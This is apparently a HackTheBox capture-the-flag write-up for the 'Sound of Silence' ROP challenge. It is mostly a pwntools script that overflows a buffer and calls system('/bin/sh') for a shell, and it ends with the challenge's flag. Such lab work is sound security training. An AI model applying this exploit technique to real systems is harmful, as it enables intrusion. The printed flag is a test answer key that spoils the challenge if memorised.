Sound of Silence

• Difficulty: Medium
• Technique: ROP

Navigate the shadows in a dimly lit room, silently evading detection as you strategize to outsmart your foes. Employ clever distractions to divert their attention, paving the way for your daring escape!

Script

from pwn import *

elf = context.binary = ELF('./sound_of_silence')

# r = remote('83.136.250.103', 59771)
r = gdb.debug('./sound_of_silence', \
            #   gdbscript='''
            #   starti
            #   break main
            #   break * 0x40117D'''
              )

system = 0x401169

padding = b'A' * 32
binsh = b'/bin/sh\x00'

payload = padding + binsh + p64(system)

r.sendline(payload)
r.interactive()

Flag

HTB{n0_n33d_4_l34k5_wh3n_u_h4v3_5y5t3m}